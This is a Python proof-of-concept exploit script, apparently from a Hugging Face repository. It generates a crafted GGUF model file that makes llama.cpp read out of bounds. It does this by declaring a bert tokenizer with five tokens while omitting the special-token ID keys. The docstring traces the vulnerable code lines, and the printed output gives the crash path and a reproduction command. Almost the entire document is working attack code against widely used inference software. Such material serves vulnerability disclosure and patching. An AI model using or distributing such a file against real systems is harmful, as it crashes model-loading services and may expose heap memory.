llama-cpp-special-token-oob-poc / poc_special_token_oob.py

Upload poc_special_token_oob.py with huggingface_hub

0584214 verified 2 months ago

15.5 kB

	#!/usr/bin/env python3
	"""
	PoC: Heap Buffer Over-read via Unvalidated Default Special Token IDs in GGUF

	Vulnerability: In llama-vocab.cpp, when tokenizer.ggml.model = "bert", default
	special token IDs are set to: bos=101, unk=100, sep=102, pad=0, mask=103
	(lines 1754-1763). These defaults are NOT validated against the actual vocabulary
	size. If the GGUF has fewer than 104 tokens AND does not include explicit
	tokenizer.ggml.bos_token_id (etc.) keys, the defaults remain.

	Later, print_info() at line 3352 does:
	id_to_token.at(special_bos_id) // special_bos_id = 101, vector size = 5
	which throws std::out_of_range. The exception propagates up and causes model
	loading to fail with "error loading model: vector" (the what() string of
	std::out_of_range from vector::at). This demonstrates the unvalidated OOB access.

	Additionally, if the model somehow survived past print_info(), the special token
	IDs would be used in tokenization (e.g., push_back(special_bos_id=101) at line
	3027), causing OOB embedding lookups -- a true heap buffer over-read.

	For the "llama" tokenizer variant, special_eos_id=2 with 1 token hits the even
	more dangerous id_to_token[tid] ([] operator, no bounds check) at line 2527
	during the special_eog_ids loop -- true undefined behavior / heap over-read.

	This script creates a raw GGUF v3 binary file with:
	- general.architecture = "llama" (so llama model loader is used)
	- tokenizer.ggml.model = "bert" (triggers OOB default special token IDs)
	- tokenizer.ggml.tokens = 5 tokens only (indices 0-4)
	- NO tokenizer.ggml.bos_token_id or other special token ID keys
	- All required llama architecture metadata
	- Minimal dummy tensors to pass model loading checks
	"""

	import struct
	import os
	import sys
	import numpy as np

	# ============================================================================
	# GGUF constants
	# ============================================================================
	GGUF_MAGIC = b"GGUF"
	GGUF_VERSION = 3
	GGUF_DEFAULT_ALIGNMENT = 32

	# GGUF value types
	GGUF_TYPE_UINT8 = 0
	GGUF_TYPE_INT8 = 1
	GGUF_TYPE_UINT16 = 2
	GGUF_TYPE_INT16 = 3
	GGUF_TYPE_UINT32 = 4
	GGUF_TYPE_INT32 = 5
	GGUF_TYPE_FLOAT32 = 6
	GGUF_TYPE_BOOL = 7
	GGUF_TYPE_STRING = 8
	GGUF_TYPE_ARRAY = 9
	GGUF_TYPE_UINT64 = 10
	GGUF_TYPE_INT64 = 11
	GGUF_TYPE_FLOAT64 = 12

	# GGML tensor types
	GGML_TYPE_F32 = 0
	GGML_TYPE_F16 = 1

	# ============================================================================
	# GGUF writing helpers
	# ============================================================================

	def write_string(f, s):
	"""Write a GGUF string: uint64 length + UTF-8 chars (no null terminator)."""
	encoded = s.encode('utf-8')
	f.write(struct.pack('<Q', len(encoded)))
	f.write(encoded)

	def write_kv_string(f, key, value):
	"""Write a KV pair with string value."""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_STRING))
	write_string(f, value)

	def write_kv_uint32(f, key, value):
	"""Write a KV pair with uint32 value."""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_UINT32))
	f.write(struct.pack('<I', value))

	def write_kv_int32(f, key, value):
	"""Write a KV pair with int32 value."""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_INT32))
	f.write(struct.pack('<i', value))

	def write_kv_float32(f, key, value):
	"""Write a KV pair with float32 value."""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
	f.write(struct.pack('<f', value))

	def write_kv_bool(f, key, value):
	"""Write a KV pair with bool value (stored as int8)."""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_BOOL))
	f.write(struct.pack('<b', 1 if value else 0))

	def write_kv_string_array(f, key, values):
	"""Write a KV pair with string array value."""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
	f.write(struct.pack('<I', GGUF_TYPE_STRING)) # element type
	f.write(struct.pack('<Q', len(values))) # array length
	for v in values:
	write_string(f, v)

	def write_kv_float32_array(f, key, values):
	"""Write a KV pair with float32 array value."""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
	f.write(struct.pack('<I', GGUF_TYPE_FLOAT32)) # element type
	f.write(struct.pack('<Q', len(values))) # array length
	for v in values:
	f.write(struct.pack('<f', v))

	def write_kv_int32_array(f, key, values):
	"""Write a KV pair with int32 array value."""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
	f.write(struct.pack('<I', GGUF_TYPE_INT32)) # element type
	f.write(struct.pack('<Q', len(values))) # array length
	for v in values:
	f.write(struct.pack('<i', v))

	def write_tensor_info(f, name, shape, ggml_type, offset):
	"""Write tensor info entry.
	Format: name (string), n_dims (uint32), dims[] (int64 each), type (int32), offset (uint64)
	"""
	write_string(f, name)
	n_dims = len(shape)
	f.write(struct.pack('<I', n_dims))
	for dim in shape:
	f.write(struct.pack('<q', dim))
	f.write(struct.pack('<i', ggml_type))
	f.write(struct.pack('<Q', offset))

	def tensor_byte_size(shape, ggml_type):
	"""Calculate raw byte size of a tensor."""
	n_elements = 1
	for d in shape:
	n_elements *= d
	if ggml_type == GGML_TYPE_F32:
	return n_elements * 4
	elif ggml_type == GGML_TYPE_F16:
	return n_elements * 2
	else:
	raise ValueError(f"Unsupported ggml_type: {ggml_type}")

	def align_offset(offset, alignment=GGUF_DEFAULT_ALIGNMENT):
	"""Align offset to the given alignment boundary."""
	return ((offset + alignment - 1) // alignment) * alignment

	# ============================================================================
	# Main PoC
	# ============================================================================

	def create_poc_gguf(output_path):
	"""Create a minimal GGUF that triggers OOB access via default bert special token IDs."""

	# Model hyperparameters (tiny llama architecture)
	n_vocab = 5 # ONLY 5 tokens -- bert defaults (100-103) will be OOB!
	n_embd = 32 # tiny embedding dimension
	n_head = 4 # attention heads
	n_head_kv = 4 # KV heads
	n_layer = 1 # single transformer layer
	n_ff = 64 # feed-forward dimension
	ctx_len = 128 # context length

	# Token list: only 5 tokens (indices 0-4)
	# bert defaults: bos=101, unk=100, sep=102, pad=0, mask=103
	# All except pad=0 are out of bounds!
	tokens = ["[PAD]", "[UNK]", "[CLS]", "[SEP]", "[MASK]"]
	token_scores = [0.0] * n_vocab
	token_types = [0] * n_vocab # all normal

	# Tensors we need for a minimal llama model
	tensors = [
	("token_embd.weight", (n_vocab, n_embd), GGML_TYPE_F16),
	("output_norm.weight", (n_embd,), GGML_TYPE_F32),
	("output.weight", (n_vocab, n_embd), GGML_TYPE_F16),
	("blk.0.attn_norm.weight", (n_embd,), GGML_TYPE_F32),
	("blk.0.attn_q.weight", (n_embd, n_embd), GGML_TYPE_F16),
	("blk.0.attn_k.weight", (n_head_kv * (n_embd // n_head), n_embd), GGML_TYPE_F16),
	("blk.0.attn_v.weight", (n_head_kv * (n_embd // n_head), n_embd), GGML_TYPE_F16),
	("blk.0.attn_output.weight", (n_embd, n_embd), GGML_TYPE_F16),
	("blk.0.ffn_norm.weight", (n_embd,), GGML_TYPE_F32),
	("blk.0.ffn_gate.weight", (n_ff, n_embd), GGML_TYPE_F16),
	("blk.0.ffn_up.weight", (n_ff, n_embd), GGML_TYPE_F16),
	("blk.0.ffn_down.weight", (n_embd, n_ff), GGML_TYPE_F16),
	]

	# -----------------------------------------------------------------------
	# Count KV pairs
	# -----------------------------------------------------------------------
	# Architecture metadata (10 keys):
	# general.architecture, general.name,
	# llama.context_length, llama.embedding_length, llama.block_count,
	# llama.attention.head_count, llama.attention.head_count_kv,
	# llama.feed_forward_length, llama.vocab_size,
	# llama.attention.layer_norm_rms_epsilon, llama.rope.dimension_count
	#
	# Tokenizer metadata (4 keys):
	# tokenizer.ggml.model, tokenizer.ggml.tokens,
	# tokenizer.ggml.scores, tokenizer.ggml.token_type
	#
	# DELIBERATELY OMITTED (to keep default OOB IDs):
	# tokenizer.ggml.bos_token_id (default: 101 for bert -> OOB!)
	# tokenizer.ggml.eos_token_id (default: LLAMA_TOKEN_NULL for bert)
	# tokenizer.ggml.unknown_token_id (default: 100 for bert -> OOB!)
	# tokenizer.ggml.separator_token_id (default: 102 for bert -> OOB!)
	# tokenizer.ggml.padding_token_id (default: 0 for bert -> in bounds)

	n_kv = 15 # 11 arch + 4 tokenizer
	n_tensors = len(tensors)

	print(f"[*] Creating PoC GGUF: {output_path}")
	print(f"[*] Vocabulary size: {n_vocab} tokens (indices 0-{n_vocab-1})")
	print(f"[*] Tokenizer model: bert")
	print(f"[*] Default special token IDs (unvalidated):")
	print(f"[*] bos_token_id = 101 (OOB! vector size = {n_vocab})")
	print(f"[*] unk_token_id = 100 (OOB! vector size = {n_vocab})")
	print(f"[*] sep_token_id = 102 (OOB! vector size = {n_vocab})")
	print(f"[*] mask_token_id = 103 (OOB! vector size = {n_vocab})")
	print(f"[*] pad_token_id = 0 (in bounds)")
	print(f"[*] No explicit special token ID keys in GGUF -> defaults are used")
	print(f"[*] Number of KV pairs: {n_kv}")
	print(f"[*] Number of tensors: {n_tensors}")

	with open(output_path, 'wb') as f:
	# ===================================================================
	# GGUF Header
	# ===================================================================
	f.write(GGUF_MAGIC) # magic (4 bytes)
	f.write(struct.pack('<I', GGUF_VERSION)) # version (uint32)
	f.write(struct.pack('<Q', n_tensors)) # n_tensors (uint64)
	f.write(struct.pack('<Q', n_kv)) # n_kv (uint64)

	# ===================================================================
	# KV Pairs - Architecture metadata
	# ===================================================================
	write_kv_string(f, "general.architecture", "llama")
	write_kv_string(f, "general.name", "poc-bert-oob-special-tokens")

	write_kv_uint32(f, "llama.context_length", ctx_len)
	write_kv_uint32(f, "llama.embedding_length", n_embd)
	write_kv_uint32(f, "llama.block_count", n_layer)
	write_kv_uint32(f, "llama.attention.head_count", n_head)
	write_kv_uint32(f, "llama.attention.head_count_kv", n_head_kv)
	write_kv_uint32(f, "llama.feed_forward_length", n_ff)
	write_kv_uint32(f, "llama.vocab_size", n_vocab)
	write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5)
	write_kv_uint32(f, "llama.rope.dimension_count", n_embd // n_head)

	# ===================================================================
	# KV Pairs - Tokenizer metadata
	# ===================================================================
	# tokenizer model = "bert" -> triggers default special IDs 100-103
	write_kv_string(f, "tokenizer.ggml.model", "bert")

	# Only 5 tokens! IDs 100-103 are wildly out of bounds.
	write_kv_string_array(f, "tokenizer.ggml.tokens", tokens)
	write_kv_float32_array(f, "tokenizer.ggml.scores", token_scores)
	write_kv_int32_array(f, "tokenizer.ggml.token_type", token_types)

	# DELIBERATELY NOT INCLUDED:
	# tokenizer.ggml.bos_token_id
	# tokenizer.ggml.eos_token_id
	# tokenizer.ggml.unknown_token_id
	# tokenizer.ggml.separator_token_id
	# tokenizer.ggml.padding_token_id
	# This means the code uses UNVALIDATED defaults from llama-vocab.cpp:1754-1763

	# ===================================================================
	# Tensor Info Entries
	# ===================================================================
	# Calculate offsets for each tensor (relative to start of tensor data)
	tensor_data_entries = []
	current_offset = 0
	for tname, tshape, ttype in tensors:
	# Each tensor's offset within the data blob must be aligned
	current_offset = align_offset(current_offset, GGUF_DEFAULT_ALIGNMENT)
	size = tensor_byte_size(tshape, ttype)
	tensor_data_entries.append((tname, tshape, ttype, current_offset, size))
	write_tensor_info(f, tname, tshape, ttype, current_offset)
	current_offset += size

	total_tensor_data_size = align_offset(current_offset, GGUF_DEFAULT_ALIGNMENT)

	# ===================================================================
	# Tensor Data (aligned to GGUF_DEFAULT_ALIGNMENT from start of file)
	# ===================================================================
	# Pad to alignment boundary before tensor data
	current_pos = f.tell()
	aligned_pos = align_offset(current_pos, GGUF_DEFAULT_ALIGNMENT)
	if aligned_pos > current_pos:
	f.write(b'\x00' * (aligned_pos - current_pos))

	data_start = f.tell()

	# Write each tensor's data (all zeros)
	for tname, tshape, ttype, toffset, tsize in tensor_data_entries:
	# Pad to reach the tensor's offset
	current_data_pos = f.tell() - data_start
	target_pos = toffset
	if target_pos > current_data_pos:
	f.write(b'\x00' * (target_pos - current_data_pos))

	# Write tensor data (all zeros for PoC)
	if ttype == GGML_TYPE_F32:
	data = np.zeros(tshape, dtype=np.float32)
	# For norm weights, use ones
	if "norm" in tname:
	data = np.ones(tshape, dtype=np.float32)
	f.write(data.tobytes())
	elif ttype == GGML_TYPE_F16:
	data = np.zeros(tshape, dtype=np.float16)
	f.write(data.tobytes())

	# Final alignment padding
	current_pos = f.tell()
	aligned_pos = align_offset(current_pos, GGUF_DEFAULT_ALIGNMENT)
	if aligned_pos > current_pos:
	f.write(b'\x00' * (aligned_pos - current_pos))

	file_size = os.path.getsize(output_path)
	print(f"\n[+] Created: {output_path}")
	print(f"[+] Size: {file_size} bytes ({file_size/1024:.1f} KB)")
	print(f"\n[*] Crash path:")
	print(f"[*] 1. llama-vocab.cpp:1754-1763 sets bert defaults: bos=101, unk=100, sep=102, mask=103")
	print(f"[*] 2. llama-vocab.cpp:2130-2131 resizes id_to_token to {n_vocab} (from token list)")
	print(f"[*] 3. llama-vocab.cpp:2215-2228 only overrides if keys EXIST in GGUF (they don't)")
	print(f"[*] 4. llama-vocab.cpp:3352 does id_to_token.at(101) -> std::out_of_range -> abort()")
	print(f"\n[+] To reproduce:")
	print(f"[+] llama-cli -m {output_path} -p 'hello'")
	print(f"[+] Expected: crash via uncaught std::out_of_range exception (abort/SIGABRT)")

	if __name__ == "__main__":
	output_dir = "/Users/eltarne/Documents/script/gguf_poc"
	os.makedirs(output_dir, exist_ok=True)

	output_path = os.path.join(output_dir, "poc_special_token_oob.gguf")
	create_poc_gguf(output_path)